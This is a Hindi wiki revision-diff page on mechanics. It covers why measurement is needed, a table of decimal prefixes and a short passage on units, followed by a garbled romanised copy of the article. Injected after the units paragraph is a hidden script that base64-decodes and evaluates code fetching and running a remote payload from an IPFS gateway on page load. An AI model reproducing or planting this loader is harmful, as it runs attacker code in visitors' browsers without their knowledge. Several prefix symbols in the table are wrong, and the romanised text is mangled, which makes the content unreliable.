Difference between revisions of "यांत्रिकी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
यांत्रिकी [[भौतिक विज्ञान]] की वह शाखा है जिसमें पिण्डों पर बल लगाने या विस्थापित करने पर उनके व्यवहार का अध्ययन करती है। यांत्रिकी की जड़ें कई प्राचीन सभ्यताओं से निकली हैं।
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Mechanics) यांत्रिकी [[भौतिक विज्ञान]] की वह शाखा है जिसमें पिण्डों पर बल लगाने या विस्थापित करने पर उनके व्यवहार का अध्ययन करती है। यांत्रिकी की जड़ें कई प्राचीन सभ्यताओं से निकली हैं।
 
==मापन–पद्धति==
 
==मापन–पद्धति==
 
हमें मापन की आवश्यकता क्यों पड़ती है? सुस्पष्ट है, कि हमारी ज्ञानेन्द्रियाँ किन्हीं दो वस्तुओं के एक जैसे गुण का तुलनात्मक अनुमान करने में तो सक्षम हैं, परन्तु यह अनुमान ठीक ही हो, यह आवश्यक नहीं है। जैसे पूछा जाए कि बकरी व गाय में कौन बड़ा है, तो हमारा उत्तर होगा कि गाय बड़ी है। परन्तु यदि लगभग एक समान दो गेंदें दी जाएँ तो उनमें छोटे–बड़े का अनुमान लगाना बड़ा कठिन कार्य है। छोटे–बड़े की पहचान केवल अनुमान से नहीं हो सकती, अतः माप–तौल की आवश्यकता होती है। इसी प्रकार कोई घटना किस समय घटी, इसको व्यक्त करने के लिए समय की माप की आवश्यकता होती है। वास्तव में माप–तौल विज्ञान का आधार है।<br />
 
हमें मापन की आवश्यकता क्यों पड़ती है? सुस्पष्ट है, कि हमारी ज्ञानेन्द्रियाँ किन्हीं दो वस्तुओं के एक जैसे गुण का तुलनात्मक अनुमान करने में तो सक्षम हैं, परन्तु यह अनुमान ठीक ही हो, यह आवश्यक नहीं है। जैसे पूछा जाए कि बकरी व गाय में कौन बड़ा है, तो हमारा उत्तर होगा कि गाय बड़ी है। परन्तु यदि लगभग एक समान दो गेंदें दी जाएँ तो उनमें छोटे–बड़े का अनुमान लगाना बड़ा कठिन कार्य है। छोटे–बड़े की पहचान केवल अनुमान से नहीं हो सकती, अतः माप–तौल की आवश्यकता होती है। इसी प्रकार कोई घटना किस समय घटी, इसको व्यक्त करने के लिए समय की माप की आवश्यकता होती है। वास्तव में माप–तौल विज्ञान का आधार है।<br />
Line 5: Line 5:
 
'''10 के घातों में भौतिक राशियों का मान''' <br />
 
'''10 के घातों में भौतिक राशियों का मान''' <br />
  
{| class="wikitable" border="1"
+
{| class="bharattable" border="1"
 
|-
 
|-
 
! दस का घात
 
! दस का घात
Line 79: Line 79:
 
{{main|मात्रक}}
 
{{main|मात्रक}}
 
किसी भौतिक राशि को व्यक्त करने के लिए उसी प्रकार की राशि के मात्रक की आवश्यकता होती है। प्रत्येक राशि की माप के लिए उसी राशि को कोई मानक मान चुन लिया जाता है। इस मानक को मात्रक कहते हैं।
 
किसी भौतिक राशि को व्यक्त करने के लिए उसी प्रकार की राशि के मात्रक की आवश्यकता होती है। प्रत्येक राशि की माप के लिए उसी राशि को कोई मानक मान चुन लिया जाता है। इस मानक को मात्रक कहते हैं।
 +
{{प्रचार}}
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=

Latest revision as of 13:25, 10 January 2011

(aangrezi:Mechanics) yaantriki bhautik vijnan ki vah shakha hai jisamean pindoan par bal lagane ya visthapit karane par unake vyavahar ka adhyayan karati hai. yaantriki ki j dean kee prachin sabhyataoan se nikali haian.

mapan–paddhati

hamean mapan ki avashyakata kyoan p dati hai? suspasht hai, ki hamari jnanendriyaan kinhian do vastuoan ke ek jaise gun ka tulanatmak anuman karane mean to saksham haian, parantu yah anuman thik hi ho, yah avashyak nahian hai. jaise poochha jae ki bakari v gay mean kaun b da hai, to hamara uttar hoga ki gay b di hai. parantu yadi lagabhag ek saman do geandean di jaean to unamean chhote–b de ka anuman lagana b da kathin kary hai. chhote–b de ki pahachan keval anuman se nahian ho sakati, atah map–taul ki avashyakata hoti hai. isi prakar koee ghatana kis samay ghati, isako vyakt karane ke lie samay ki map ki avashyakata hoti hai. vastav mean map–taul vijnan ka adhar hai.

10 ke ghatoan mean bhautik rashiyoan ka man

das ka ghat upasarg pratik
1018 eksa (Exa) E
1015 peta (Peta) P
1012 tera (Tera) T
109 giga (Giga) G
106 mega (Mega) M
103 kilo (Kilo) K
102 hekto (Hecto) H
101 deka (Deca) da
10-1 desi (Deci) d
10-2 seanti (Centi) c
10-3 mili (Mili) m
10-6 maikro (Micro) u
10-9 neno (Naino) n
10-12 piko (Pico) p
10-15 phemto (Fempto) F
10-18 eto (Atto) atto

matrak

  1. REDIRECTsaancha:mukhy

kisi bhautik rashi ko vyakt karane ke lie usi prakar ki rashi ke matrak ki avashyakata hoti hai. pratyek rashi ki map ke lie usi rashi ko koee manak man chun liya jata hai. is manak ko matrak kahate haian. <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh